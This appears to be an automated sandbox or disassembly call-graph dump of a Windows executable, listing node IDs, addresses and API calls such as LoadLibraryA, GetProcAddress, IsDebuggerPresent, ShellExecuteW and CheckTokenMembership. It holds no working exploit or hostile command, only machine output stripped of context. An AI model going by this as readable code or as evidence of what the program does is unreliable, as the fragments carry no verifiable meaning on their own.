94457->94555 94556 906e20 IsProcessorFeaturePresent 94458->94556 94460 912d95 94460->94378 94462 9011a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94461->94462 94464 9011e0 __IsNonwritableInCurrentImage 94462->94464 94579 900f0a 52 API calls __cinit 94462->94579 94464->94382 94466 8e3a29 94465->94466 94467 951ebf 94465->94467 94468 8e3a63 745EC8D0 94466->94468 94580 901405 94468->94580 94472 8e3a8f 94592 8e3adb SystemParametersInfoW SystemParametersInfoW 94472->94592 94474 8e3a9b 94593 8e3d19 94474->94593 94476 8e3aa3 SystemParametersInfoW 94477 8e3ac8 94476->94477 94477->94386 94478->94360 94479->94365 94480->94372 94484->94387 94485->94390 94486->94396 94487->94398 94488->94402 94489->94403 94492 90698d 94490->94492 94493 9069ca 94492->94493 94494 9069ab Sleep 94492->94494 94499 9130aa 94492->94499 94493->94407 94496 907ec9 TlsSetValue 94493->94496 94495 9069c2 94494->94495 94495->94492 94495->94493 94496->94410 94497->94414 94498->94411 94500 9130d0 __calloc_impl 94499->94500 94501 9130b5 94499->94501 94504 9130e0 RtlAllocateHeap 94500->94504 94505 9130c6 94500->94505 94501->94500 94502 9130c1 94501->94502 94506 907c0e 47 API calls __getptd_noexit 94502->94506 94504->94500 94504->94505 94505->94492 94506->94505 94508 907d05 94507->94508 94509 907d18 RtlEnterCriticalSection 94507->94509 94515 907d7c 94508->94515 94509->94418 94511 907d0b 94511->94509 94539 90115b 47 API calls 3 library calls 94511->94539 94514->94422 94516 907d88 __fcloseall 94515->94516 94517 907d91 94516->94517 94518 907da9 94516->94518 94540 9081c2 47 API calls 2 library calls 94517->94540 94524 907e11 __fcloseall 94518->94524 94533 907da7 94518->94533 94521 907d96 94541 90821f 47 API calls 6 library calls 94521->94541 94522 907dbd 94525 907dd3 94522->94525 94526 907dc4 94522->94526 94524->94511 94529 907cf4 __lock 46 API calls 94525->94529 94544 907c0e 47 API calls __getptd_noexit 94526->94544 94527 907d9d 94542 901145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94527->94542 94532 907dda 94529->94532 94531 907dc9 94531->94524 94534 907de9 InitializeCriticalSectionAndSpinCount 94532->94534 94535 907dfe 94532->94535 94533->94518 94543 9069d0 47 API calls __malloc_crt 94533->94543 94536 907e04 94534->94536 94545 901c9d 94535->94545 94551 907e1a RtlLeaveCriticalSection _doexit 94536->94551 94540->94521 94541->94527 94543->94522 94544->94531 94546 901ccf __dosmaperr 94545->94546 94547 901ca6 RtlFreeHeap 94545->94547 94546->94536 94547->94546 94548 901cbb 94547->94548 94552 907c0e 47 API calls __getptd_noexit 94548->94552 94550 901cc1 GetLastError 94550->94546 94551->94524 94552->94550 94553->94440 94554->94446 94555->94457 94557 906e2b 94556->94557 94562 906cb5 94557->94562 94561 906e46 94561->94460 94563 906ccf _memset ___raise_securityfailure 94562->94563 94564 906cef IsDebuggerPresent 94563->94564 94570 9081ac SetUnhandledExceptionFilter UnhandledExceptionFilter 94564->94570 94567 906dd6 94569 908197 GetCurrentProcess TerminateProcess 94567->94569 94568 906db3 ___raise_securityfailure 94571 90a70c 94568->94571 94569->94561 94570->94568 94572 90a714 94571->94572 94573 90a716 IsProcessorFeaturePresent 94571->94573 94572->94567 94575 9137b0 94573->94575 94578 91375f 5 API calls ___raise_securityfailure 94575->94578 94577 913893 94577->94567 94578->94577 94579->94464 94581 907cf4 __lock 47 API calls 94580->94581 94582 901410 94581->94582 94645 907e58 RtlLeaveCriticalSection 94582->94645 94584 8e3a88 94585 90146d 94584->94585 94586 901491 94585->94586 94587 901477 94585->94587 94586->94472 94587->94586 94646 907c0e 47 API calls __getptd_noexit 94587->94646 94589 901481 94647 906e10 8 API calls __ftell_nolock 94589->94647 94591 90148c 94591->94472 94592->94474 94594 8e3d26 __ftell_nolock 94593->94594 94595 8ed7f7 48 API calls 94594->94595 94596 8e3d31 GetCurrentDirectoryW 94595->94596 94648 8e61ca 94596->94648 94598 8e3d57 IsDebuggerPresent 94599 951cc1 MessageBoxA 94598->94599 94600 8e3d65 94598->94600 94602 951cd9 94599->94602 94600->94602 94603 8e3d82 94600->94603 94632 8e3e3a 94600->94632 94601 8e3e41 SetCurrentDirectoryW 94606 8e3e4e Mailbox 94601->94606 94822 8fc682 48 API calls 94602->94822 94722 8e40e5 94603->94722 94606->94476 94607 951ce9 94612 951cff SetCurrentDirectoryW 94607->94612 94609 8e3da0 GetFullPathNameW 94610 8e6a63 48 API calls 94609->94610 94611 8e3ddb 94610->94611 94736 8e6430 94611->94736 94612->94606 94615 8e3df6 94616 8e3e00 94615->94616 94823 9271fa AllocateAndInitializeSid CheckTokenMembership FreeSid 94615->94823 94752 8e3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 94616->94752 94620 951d1c 94620->94616 94623 951d2d 94620->94623 94622 8e3e0a 94625 8e3e1f 94622->94625 94627 8e4ffc 67 API calls 94622->94627 94624 8e5374 50 API calls 94623->94624 94626 951d35 94624->94626 94760 8ee8d0 94625->94760 94629 8ece19 48 API calls 94626->94629 94627->94625 94631 951d42 94629->94631 94633 951d6e 94631->94633 94634 951d49 94631->94634 94632->94601 94637 8e518c 48 API calls 94633->94637 94636 8e518c 48 API calls 94634->94636 94638 951d54 94636->94638 94644 951d6a GetForegroundWindow ShellExecuteW 94637->94644 94639 8e510d 48 API calls 94638->94639 94641 951d61 94639->94641 94643 8e518c 48 API calls 94641->94643 94642 951d9e Mailbox 94642->94632 94643->94644 94644->94642 94645->94584 94646->94589 94647->94591 94824 8fe99b 94648->94824 94652 8e61eb 94653 8e5374 50 API calls 94652->94653 94654 8e61ff 94653->94654 94655 8ece19 48 API calls 94654->94655 94656 8e620c 94655->94656 94841 8e39db 94656->94841 94658 8e6216 Mailbox 94659 8e6eed 48 API calls 94658->94659 94660 8e622b 94659->94660 94853 8e9048 94660->94853 94663 8ece19 48 API calls 94664 8e6244 94663->94664 94856 8ed6e9 94664->94856 94666 8e6254 Mailbox 94667 8ece19 48 API calls 94666->94667 94668 8e627c 94667->94668 94669 8ed6e9 55 API calls 94668->94669 94670 8e628f Mailbox 94669->94670 94671 8ece19 48 API calls 94670->94671 94672 8e62a0 94671->94672 94860 8ed645 94672->94860 94674 8e62b2 Mailbox 94675 8ed7f7 48 API calls 94674->94675 94676 8e62c5 94675->94676 94870 8e63fc 94676->94870 94680 8e62df 94681 8e62e9 94680->94681 94682 951c08 94680->94682 94683 900fa7 _W_store_winword 59 API calls 94681->94683 94684 8e63fc 48 API calls 94682->94684 94685 8e62f4 94683->94685 94686 951c1c 94684->94686 94685->94686 94687 8e62fe 94685->94687 94689 8e63fc 48 API calls 94686->94689 94688 900fa7 _W_store_winword 59 API calls 94687->94688 94690 8e6309 94688->94690 94691 951c38 94689->94691 94690->94691 94692 8e6313 94690->94692 94693 8e5374 50 API calls 94691->94693 94694 900fa7 _W_store_winword 59 API calls 94692->94694 94695 951c5d 94693->94695 94696 8e631e 94694->94696 94697 8e63fc 48 API calls 94695->94697 94698 8e635f 94696->94698 94700 951c86 94696->94700 94703 8e63fc 48 API calls 94696->94703 94701 951c69 94697->94701 94699 8e636c 94698->94699 94698->94700 94705 8fc050 48 API calls 94699->94705 94704 8e6eed 48 API calls 94700->94704 94702 8e6eed 48 API calls 94701->94702 94706 951c77 94702->94706 94707 8e6342 94703->94707 94708 951ca8 94704->94708 94710 8e6384 94705->94710 94711 8e63fc 48 API calls 94706->94711 94712 8e6eed 48 API calls 94707->94712 94709 8e63fc 48 API calls 94708->94709 94713 951cb5 94709->94713 94714 8f1b90 48 API calls 94710->94714 94711->94700 94715 8e6350 94712->94715 94713->94713 94719 8e6394 94714->94719 94716 8e63fc 48 API calls 94715->94716 94716->94698 94717 8f1b90 48 API calls 94717->94719 94719->94717 94720 8e63fc 48 API calls 94719->94720 94721 8e63d6 Mailbox 94719->94721 94886 8e6b68 48 API calls 94719->94886 94720->94719 94721->94598 94723 8e40f2 __ftell_nolock 94722->94723 94724 8e410b 94723->94724 94728 95370e _memset 94723->94728 94725 8e660f 49 API calls 94724->94725 94726 8e4114 94725->94726 95514 8e40a7 94726->95514 94731 8e6a63 48 API calls 94728->94731 94733 95378e 94731->94733 94732 8e4129 95532 8e4139 94732->95532 94733->94733 94737 8e643d __ftell_nolock 94736->94737 95742 8e4c75 94737->95742 94739 8e6442 94751 8e3dee 94739->94751 95753 8e5928 86 API calls 94739->95753 94741 8e644f 94741->94751 95754 8e5798 88 API calls Mailbox 94741->95754 94743 8e6458 94744 8e645c GetFullPathNameW 94743->94744 94743->94751 94745 8e6a63 48 API calls 94744->94745 94746 8e6488 94745->94746 94747 8e6a63 48 API calls 94746->94747 94748 8e6495 94747->94748 94749 955dcf _wcscat 94748->94749 94750 8e6a63 48 API calls 94748->94750 94750->94751 94751->94607 94751->94615 94753 8e3ed8 94752->94753 94754 951cba 94752->94754 95791 8e4024 94753->95791 94759 8e36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94759->94622 94761 8ee8f6 94760->94761 94818 8ee906 Mailbox 94760->94818 94762 8eed52 94761->94762 94761->94818 95886 8fe3cd 335 API calls 94762->95886 94764 8e3e2a 94764->94632 94821 8e3847 Shell_NotifyIconW _memset 94764->94821 94766 8eed63 94766->94764 94767 8eed70 94766->94767 95888 8fe312 335 API calls Mailbox 94767->95888 94768 8ee94c PeekMessageW 94768->94818 94770 95526e Sleep 94770->94818 94771 8eed77 LockWindowUpdate DestroyWindow GetMessageW 94771->94764 94773 8eeda9 94771->94773 94775 9559ef TranslateMessage DispatchMessageW GetMessageW 94773->94775 94774 8eebc7 94774->94764 95887 8e2ff6 16 API calls 94774->95887 94775->94775 94777 955a1f 94775->94777 94777->94764 94778 8eed21 PeekMessageW 94778->94818 94779 8e1caa 49 API calls 94779->94818 94780 8eebf7 timeGetTime 94780->94818 94782 8ff4ea 48 API calls 94782->94818 94783 8e6eed 48 API calls 94783->94818 94784 8eed3a TranslateMessage DispatchMessageW 94784->94778 94785 955557 WaitForSingleObject 94786 955574 GetExitCodeProcess CloseHandle 94785->94786 94785->94818 94786->94818 94787 8ed7f7 48 API calls 94812 955429 Mailbox 94787->94812 94788 95588f Sleep 94788->94812 94789 8eedae timeGetTime 95889 8e1caa 49 API calls 94789->95889 94790 955733 Sleep 94790->94812 94794 955926 GetExitCodeProcess 94798 955952 CloseHandle 94794->94798 94799 95593c WaitForSingleObject 94794->94799 94796 8e2aae 311 API calls 94796->94818 94797 8fdc38 timeGetTime 94797->94812 94798->94812 94799->94798 94799->94818 94800 955445 Sleep 94800->94818 94801 955432 Sleep 94801->94800 94802 948c4b 108 API calls 94802->94812 94803 8e2c79 107 API calls 94803->94812 94805 9559ae Sleep 94805->94818 94806 8ece19 48 API calls 94806->94812 94810 8ed6e9 55 API calls 94810->94812 94811 8efe30 311 API calls 94811->94818 94812->94787 94812->94794 94812->94797 94812->94800 94812->94801 94812->94802 94812->94803 94812->94805 94812->94806 94812->94810 94812->94818 95891 924cbe 49 API calls Mailbox 94812->95891 95892 8e1caa 49 API calls 94812->95892 95893 8e2aae 335 API calls 94812->95893 95894 93ccb2 50 API calls 94812->95894 95895 927a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94812->95895 95896 926532 63 API calls 3 library calls 94812->95896 94817 92cc5c 86 API calls 94817->94818 94818->94768 94818->94770 94818->94774 94818->94778 94818->94779 94818->94780 94818->94782 94818->94783 94818->94784 94818->94785 94818->94788 94818->94789 94818->94790 94818->94796 94818->94800 94818->94811 94818->94812 94818->94817 94819 8ece19 48 API calls 94818->94819 94820 8ed6e9 55 API calls 94818->94820 95799 8ef110 94818->95799 95864 8f45e0 94818->95864 95881 8eeed0 335 API calls Mailbox 94818->95881 95882 8eef00 335 API calls 94818->95882 95883 8f3200 335 API calls 2 library calls 94818->95883 95884 8fe244 TranslateAcceleratorW 94818->95884 95885 8fdc5f IsDialogMessageW GetClassLongW 94818->95885 95890 948d23 48 API calls 94818->95890 94819->94818 94820->94818 94821->94632 94822->94607 94823->94620 94825 8ed7f7 48 API calls 94824->94825 94826 8e61db 94825->94826 94827 8e6009 94826->94827 94828 8e6016 __ftell_nolock 94827->94828 94829 8e6a63 48 API calls 94828->94829 94834 8e617c Mailbox 94828->94834 94831 8e6048 94829->94831 94839 8e607e Mailbox 94831->94839 94887 8e61a6 94831->94887 94832 8e614f 94833 8ece19 48 API calls 94832->94833 94832->94834 94836 8e6170 94833->94836 94834->94652 94835 8ece19 48 API calls 94835->94839 94837 8e64cf 48 API calls 94836->94837 94837->94834 94838 8e64cf 48 API calls 94838->94839 94839->94832 94839->94834 94839->94835 94839->94838 94840 8e61a6 48 API calls 94839->94840 94840->94839 94890 8e41a9 94841->94890 94844 8e3a06 94844->94658 94847 952ff0 94848 901c9d _free 47 API calls 94847->94848 94850 952ffd 94848->94850 94851 8e4252 84 API calls 94850->94851 94852 953006 94851->94852 94852->94852 94854 8ff4ea 48 API calls 94853->94854 94855 8e6237 94854->94855 94855->94663 94857 8ed6f4 94856->94857 94859 8ed71b 94857->94859 95507 8ed764 55 API calls 94857->95507 94859->94666 94861 8ed654 94860->94861 94869 8ed67e 94860->94869 94862 8ed65b 94861->94862 94866 8ed6c2 94861->94866 94863 8ed6ab 94862->94863 94864 8ed666 94862->94864 94863->94869 95509 8fdce0 53 API calls 94863->95509 95508 8ed9a0 53 API calls __cinit 94864->95508 94866->94863 95510 8fdce0 53 API calls 94866->95510 94869->94674 94871 8e641f 94870->94871 94872 8e6406 94870->94872 94873 8e6a63 48 API calls 94871->94873 94874 8e6eed 48 API calls 94872->94874 94875 8e62d1 94873->94875 94874->94875 94876 900fa7 94875->94876 94877 900fb3 94876->94877 94878 901028 94876->94878 94885 900fd8 94877->94885 95511 907c0e 47 API calls __getptd_noexit 94877->95511 95513 90103a 59 API calls 3 library calls 94878->95513 94881 901035 94881->94680 94882 900fbf 95512 906e10 8 API calls __ftell_nolock 94882->95512 94884 900fca 94884->94680 94885->94680 94886->94719 94888 8ebdfa 48 API calls 94887->94888 94889 8e61b1 94888->94889 94889->94831 94955 8e4214 94890->94955 94895 954f73 94898 8e4252 84 API calls 94895->94898 94896 8e41d4 LoadLibraryExW 94965 8e4291 94896->94965 94900 954f7a 94898->94900 94902 8e4291 3 API calls 94900->94902 94903 954f82 94902->94903 94991 8e44ed 94903->94991 94904 8e41fb 94904->94903 94905 8e4207 94904->94905 94907 8e4252 84 API calls 94905->94907 94909 8e39fe 94907->94909 94909->94844 94914 92c396 94909->94914 94911 954fa9 94999 8e4950 94911->94999 94913 954fb6 94915 8e4517 83 API calls 94914->94915 94916 92c405 94915->94916 95292 92c56d 94916->95292 94919 8e44ed 64 API calls 94920 92c432 94919->94920 94921 8e44ed 64 API calls 94920->94921 94922 92c442 94921->94922 94923 8e44ed 64 API calls 94922->94923 94924 92c45d 94923->94924 94925 8e44ed 64 API calls 94924->94925 94926 92c478 94925->94926 94927 8e4517 83 API calls 94926->94927 94928 92c48f 94927->94928 94929 90395c __malloc_crt 47 API calls 94928->94929 94930 92c496 94929->94930 94931 90395c __malloc_crt 47 API calls 94930->94931 94932 92c4a0 94931->94932 94933 8e44ed 64 API calls 94932->94933 94934 92c4b4 94933->94934 94935 92bf5a GetSystemTimeAsFileTime 94934->94935 94936 92c4c7 94935->94936 94937 92c4f1 94936->94937 94938 92c4dc 94936->94938 94939 92c556 94937->94939 94940 92c4f7 94937->94940 94941 901c9d _free 47 API calls 94938->94941 94943 901c9d _free 47 API calls 94939->94943 95298 92b965 94940->95298 94944 92c4e2 94941->94944 94948 92c41b 94943->94948 94946 901c9d _free 47 API calls 94944->94946 94946->94948 94947 901c9d _free 47 API calls 94947->94948 94948->94847 94949 8e4252 94948->94949 94950 8e425c 94949->94950 94952 8e4263 94949->94952 94951 9035e4 __fcloseall 83 API calls 94950->94951 94951->94952 94953 8e4272 94952->94953 94954 8e4283 FreeLibrary 94952->94954 94953->94847 94954->94953 95004 8e4339 94955->95004 94958 8e423c 94960 8e41bb 94958->94960 94961 8e4244 FreeLibrary 94958->94961 94962 903499 94960->94962 94961->94960 95012 9034ae 94962->95012 94964 8e41c8 94964->94895 94964->94896 95091 8e42e4 94965->95091 94969 8e41ec 94972 8e4380 94969->94972 94970 8e42c1 FreeLibrary 94970->94969 94971 8e42b8 94971->94969 94971->94970 94973 8ff4ea 48 API calls 94972->94973 94974 8e4395 94973->94974 94975 8e47b7 48 API calls 94974->94975 94976 8e43a1 ___crtGetEnvironmentStringsW 94975->94976 94977 8e43dc 94976->94977 94978 8e4499 94976->94978 94979 8e44d1 94976->94979 94980 8e4950 57 API calls 94977->94980 95099 8e406b CreateStreamOnHGlobal 94978->95099 95110 92c750 93 API calls 94979->95110 94988 8e43e5 94980->94988 94983 8e44ed 64 API calls 94983->94988 94984 8e4479 94984->94904 94986 954ed7 94987 8e4517 83 API calls 94986->94987 94989 954eeb 94987->94989 94988->94983 94988->94984 94988->94986 95105 8e4517 94988->95105 94990 8e44ed 64 API calls 94989->94990 94990->94984 94992 8e44ff 94991->94992 94993 954fc0 94991->94993 95134 90381e 94992->95134 94996 92bf5a 95269 92bdb4 94996->95269 94998 92bf70 94998->94911 95000 8e495f 94999->95000 95001 955002 94999->95001 95274 903e65 95000->95274 95003 8e4967 95003->94913 95008 8e434b 95004->95008 95007 8e4321 LoadLibraryA GetProcAddress 95007->94958 95009 8e422f 95008->95009 95010 8e4354 LoadLibraryA 95008->95010 95009->94958 95009->95007 95010->95009 95011 8e4365 GetProcAddress 95010->95011 95011->95009 95015 9034ba __fcloseall 95012->95015 95013 9034cd 95060 907c0e 47 API calls __getptd_noexit 95013->95060 95015->95013 95017 9034fe 95015->95017 95016 9034d2 95061 906e10 8 API calls __ftell_nolock 95016->95061 95031 90e4c8 95017->95031 95020 903503 95021 903519 95020->95021 95022 90350c 95020->95022 95024 903543 95021->95024 95025 903523 95021->95025 95062 907c0e 47 API calls __getptd_noexit 95022->95062 95045 90e5e0 95024->95045 95063 907c0e 47 API calls __getptd_noexit 95025->95063 95026 9034dd __fcloseall @_EH4_CallFilterFunc@8 95026->94964 95032 90e4d4 __fcloseall 95031->95032 95033 907cf4 __lock 47 API calls 95032->95033 95043 90e4e2 95033->95043 95034 90e552 95065 90e5d7 95034->95065 95035 90e559 95070 9069d0 47 API calls __malloc_crt 95035->95070 95038 90e560 95038->95034 95040 90e56f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 95038->95040 95039 90e5cc __fcloseall 95039->95020 95040->95034 95041 907d7c __mtinitlocknum 47 API calls 95041->95043 95043->95034 95043->95035 95043->95041 95068 904e5b 48 API calls __lock 95043->95068 95069 904ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 95043->95069 95053 90e600 __wopenfile 95045->95053 95046 90e61a 95075 907c0e 47 API calls __getptd_noexit 95046->95075 95048 90e7d5 95048->95046 95052 90e838 95048->95052 95049 90e61f 95076 906e10 8 API calls __ftell_nolock 95049->95076 95051 90354e 95064 903570 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 95051->95064 95072 9163c9 95052->95072 95053->95046 95053->95048 95077 90185b 59 API calls 2 library calls 95053->95077 95056 90e7ce 95056->95048 95078 90185b 59 API calls 2 library calls 95056->95078 95058 90e7ed 95058->95048 95079 90185b 59 API calls 2 library calls 95058->95079 95060->95016 95061->95026 95062->95026 95063->95026 95064->95026 95071 907e58 RtlLeaveCriticalSection 95065->95071 95067 90e5de 95067->95039 95068->95043 95069->95043 95070->95038 95071->95067 95080 915bb1 95072->95080 95074 9163e2 95074->95051 95075->95049 95076->95051 95077->95056 95078->95058 95079->95048 95082 915bbd __fcloseall 95080->95082 95081 915bcf 95083 907c0e __ftell_nolock 47 API calls 95081->95083 95082->95081 95084 915c06 95082->95084 95085 915bd4 95083->95085 95086 915c78 __wsopen_helper 110 API calls 95084->95086 95087 906e10 __ftell_nolock 8 API calls 95085->95087 95088 915c23 95086->95088 95090 915bde __fcloseall 95087->95090 95089 915c4c __wsopen_helper RtlLeaveCriticalSection 95088->95089 95089->95090 95090->95074 95095 8e42f6 95091->95095 95094 8e42cc LoadLibraryA GetProcAddress 95094->94971 95096 8e42aa 95095->95096 95097 8e42ff LoadLibraryA 95095->95097 95096->94971 95096->95094 95097->95096 95098 8e4310 GetProcAddress 95097->95098 95098->95096 95100 8e4085 FindResourceExW 95099->95100 95101 8e40a2 95099->95101 95100->95101 95102 954f16 LoadResource 95100->95102 95101->94977 95102->95101 95103 954f2b SizeofResource 95102->95103 95103->95101 95104 954f3f LockResource 95103->95104 95104->95101 95106 8e4526 95105->95106 95109 954fe0 95105->95109 95111 903a8d 95106->95111 95108 8e4534 95108->94988 95110->94977 95114 903a99 __fcloseall 95111->95114 95112 903aa7 95124 907c0e 47 API calls __getptd_noexit 95112->95124 95114->95112 95115 903acd 95114->95115 95126 904e1c 95115->95126 95116 903aac 95125 906e10 8 API calls __ftell_nolock 95116->95125 95119 903ad3 95132 9039fe 81 API calls 2 library calls 95119->95132 95121 903ae2 95133 903b04 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 95121->95133 95123 903ab7 __fcloseall 95123->95108 95124->95116 95125->95123 95127 904e2c 95126->95127 95128 904e4e RtlEnterCriticalSection 95126->95128 95127->95128 95130 904e34 95127->95130 95129 904e44 95128->95129 95129->95119 95131 907cf4 __lock 47 API calls 95130->95131 95131->95129 95132->95121 95133->95123 95137 903839 95134->95137 95136 8e4510 95136->94996 95138 903845 __fcloseall 95137->95138 95139 903888 95138->95139 95140 90385b _memset 95138->95140 95142 903880 __fcloseall 95138->95142 95141 904e1c __lock_file 48 API calls 95139->95141 95164 907c0e 47 API calls __getptd_noexit 95140->95164 95143 90388e 95141->95143 95142->95136 95150 90365b 95143->95150 95146 903875 95165 906e10 8 API calls __ftell_nolock 95146->95165 95152 903676 _memset 95150->95152 95157 903691 95150->95157 95151 903681 95265 907c0e 47 API calls __getptd_noexit 95151->95265 95152->95151 95152->95157 95162 9036cf 95152->95162 95154 903686 95266 906e10 8 API calls __ftell_nolock 95154->95266 95166 9038c2 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 95157->95166 95158 9037e0 _memset 95268 907c0e 47 API calls __getptd_noexit 95158->95268 95162->95157 95162->95158 95167 902933 95162->95167 95174 90ee0e 95162->95174 95245 90eb66 95162->95245 95267 90ec87 47 API calls 3 library calls 95162->95267 95164->95146 95165->95142 95166->95142 95168 902952 95167->95168 95169 90293d 95167->95169 95168->95162 95170 907c0e __ftell_nolock 47 API calls 95169->95170 95171 902942 95170->95171 95172 906e10 __ftell_nolock 8 API calls 95171->95172 95173 90294d 95172->95173 95173->95162 95175 90ee46 95174->95175 95176 90ee2f 95174->95176 95178 90f57e 95175->95178 95183 90ee80 95175->95183 95177 907bda __chsize_nolock 47 API calls 95176->95177 95180 90ee34 95177->95180 95179 907bda __chsize_nolock 47 API calls 95178->95179 95181 90f583 95179->95181 95182 907c0e __ftell_nolock 47 API calls 95180->95182 95185 907c0e __ftell_nolock 47 API calls 95181->95185 95225 90ee3b 95182->95225 95184 90ee88 95183->95184 95191 90ee9f 95183->95191 95186 907bda __chsize_nolock 47 API calls 95184->95186 95187 90ee94 95185->95187 95188 90ee8d 95186->95188 95189 906e10 __ftell_nolock 8 API calls 95187->95189 95192 907c0e __ftell_nolock 47 API calls 95188->95192 95189->95225 95190 90eeb4 95193 907bda __chsize_nolock 47 API calls 95190->95193 95191->95190 95194 90eece 95191->95194 95195 90eeec 95191->95195 95191->95225 95192->95187 95193->95188 95194->95190 95198 90eed9 95194->95198 95197 9069d0 __malloc_crt 47 API calls 95195->95197 95199 90eefc 95197->95199 95200 913bf2 __flswbuf 47 API calls 95198->95200 95201 90ef04 95199->95201 95202 90ef1f 95199->95202 95203 90efed 95200->95203 95204 907c0e __ftell_nolock 47 API calls 95201->95204 95206 90f82f __lseeki64_nolock 49 API calls 95202->95206 95205 90f066 ReadFile 95203->95205 95210 90f003 GetConsoleMode 95203->95210 95207 90ef09 95204->95207 95208 90f546 GetLastError 95205->95208 95209 90f088 95205->95209 95211 90ef2d 95206->95211 95212 907bda __chsize_nolock 47 API calls 95207->95212 95213 90f553 95208->95213 95214 90f046 95208->95214 95209->95208 95219 90f058 95209->95219 95215 90f063 95210->95215 95216 90f017 95210->95216 95211->95198 95217 90ef14 95212->95217 95218 907c0e __ftell_nolock 47 API calls 95213->95218 95222 907bed __dosmaperr 47 API calls 95214->95222 95227 90f04c 95214->95227 95215->95205 95216->95215 95220 90f01d ReadConsoleW 95216->95220 95217->95225 95223 90f558 95218->95223 95219->95227 95228 90f0bd 95219->95228 95229 90f32a 95219->95229 95220->95219 95221 90f040 GetLastError 95220->95221 95221->95214 95222->95227 95224 907bda __chsize_nolock 47 API calls 95223->95224 95224->95227 95225->95162 95226 901c9d _free 47 API calls 95226->95225 95227->95225 95227->95226 95231 90f129 ReadFile 95228->95231 95237 90f1aa 95228->95237 95229->95227 95232 90f430 ReadFile 95229->95232 95233 90f14a GetLastError 95231->95233 95241 90f154 95231->95241 95236 90f453 GetLastError 95232->95236 95244 90f461 95232->95244 95233->95241 95234 90f267 95239 90f217 MultiByteToWideChar 95234->95239 95240 90f82f __lseeki64_nolock 49 API calls 95234->95240 95235 90f257 95238 907c0e __ftell_nolock 47 API calls 95235->95238 95236->95244 95237->95227 95237->95234 95237->95235 95237->95239 95238->95227 95239->95221 95239->95227 95240->95239 95241->95228 95242 90f82f __lseeki64_nolock 49 API calls 95241->95242 95242->95241 95243 90f82f __lseeki64_nolock 49 API calls 95243->95244 95244->95229 95244->95243 95246 90eb71 95245->95246 95250 90eb86 95245->95250 95247 907c0e __ftell_nolock 47 API calls 95246->95247 95248 90eb76 95247->95248 95249 906e10 __ftell_nolock 8 API calls 95248->95249 95257 90eb81 95249->95257 95251 90ebbb 95250->95251 95252 913e24 __getbuf 47 API calls 95250->95252 95250->95257 95253 902933 __ftell_nolock 47 API calls 95251->95253 95252->95251 95254 90ebcf 95253->95254 95255 90ed06 __filbuf 62 API calls 95254->95255 95256 90ebd6 95255->95256 95256->95257 95258 902933 __ftell_nolock 47 API calls 95256->95258 95257->95162 95259 90ebf9 95258->95259 95259->95257 95260 902933 __ftell_nolock 47 API calls 95259->95260 95261 90ec05 95260->95261 95261->95257 95262 902933 __ftell_nolock 47 API calls 95261->95262 95263 90ec12 95262->95263 95264 902933 __ftell_nolock 47 API calls 95263->95264 95264->95257 95265->95154 95266->95157 95267->95162 95268->95154 95272 90344a GetSystemTimeAsFileTime 95269->95272 95271 92bdc3 95271->94998 95273 903478 __aulldiv 95272->95273 95273->95271 95275 903e71 __fcloseall 95274->95275 95276 903e94 95275->95276 95277 903e7f 95275->95277 95279 904e1c __lock_file 48 API calls 95276->95279 95288 907c0e 47 API calls __getptd_noexit 95277->95288 95281 903e9a 95279->95281 95280 903e84 95289 906e10 8 API calls __ftell_nolock 95280->95289 95290 903b0c 55 API calls 2 library calls 95281->95290 95284 903e8f __fcloseall 95284->95003 95285 903ea5 95291 903ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 95285->95291 95287 903eb7 95287->95284 95288->95280 95289->95284 95290->95285 95291->95287 95295 92c581 __tzset_nolock _wcscmp 95292->95295 95293 8e44ed 64 API calls 95293->95295 95294 92bf5a GetSystemTimeAsFileTime 95294->95295 95295->95293 95295->95294 95296 92c417 95295->95296 95297 8e4517 83 API calls 95295->95297 95296->94919 95296->94948 95297->95295 95299 92b970 95298->95299 95300 92b97e 95298->95300 95301 903499 117 API calls 95299->95301 95302 92b9c3 95300->95302 95303 903499 117 API calls 95300->95303 95314 92b987 95300->95314 95301->95300 95329 92bbe8 95302->95329 95304 92b9a8 95303->95304 95304->95302 95307 92b9b1 95304->95307 95306 92ba07 95308 92ba0b 95306->95308 95309 92ba2c 95306->95309 95311 9035e4 __fcloseall 83 API calls 95307->95311 95307->95314 95310 92ba18 95308->95310 95313 9035e4 __fcloseall 83 API calls 95308->95313 95333 92b7e5 95309->95333 95310->95314 95316 9035e4 __fcloseall 83 API calls 95310->95316 95311->95314 95313->95310 95314->94947 95316->95314 95317 92ba5a 95342 92ba8a 95317->95342 95318 92ba3a 95320 92ba47 95318->95320 95322 9035e4 __fcloseall 83 API calls 95318->95322 95320->95314 95323 9035e4 __fcloseall 83 API calls 95320->95323 95322->95320 95323->95314 95326 92ba75 95326->95314 95328 9035e4 __fcloseall 83 API calls 95326->95328 95328->95314 95330 92bc0d 95329->95330 95332 92bbf6 __tzset_nolock ___crtGetEnvironmentStringsW 95329->95332 95331 90381e __fread_nolock 64 API calls 95330->95331 95331->95332 95332->95306 95334 90395c __malloc_crt 47 API calls 95333->95334 95335 92b7f4 95334->95335 95336 90395c __malloc_crt 47 API calls 95335->95336 95337 92b808 95336->95337 95338 90395c __malloc_crt 47 API calls 95337->95338 95339 92b81c 95338->95339 95340 92bb64 47 API calls 95339->95340 95341 92b82f 95339->95341 95340->95341 95341->95317 95341->95318 95349 92baa0 95342->95349 95343 92bb51 95375 92bd8a 95343->95375 95344 92b841 64 API calls 95344->95349 95346 92ba61 95350 92bb64 95346->95350 95349->95343 95349->95344 95349->95346 95371 92bc67 95349->95371 95379 92b942 64 API calls 95349->95379 95351 92bb71 95350->95351 95352 92bb77 95350->95352 95353 901c9d _free 47 API calls 95351->95353 95354 92bb88 95352->95354 95355 901c9d _free 47 API calls 95352->95355 95353->95352 95356 92ba68 95354->95356 95357 901c9d _free 47 API calls 95354->95357 95355->95354 95356->95326 95358 9035e4 95356->95358 95357->95356 95359 9035f0 __fcloseall 95358->95359 95360 903604 95359->95360 95361 90361c 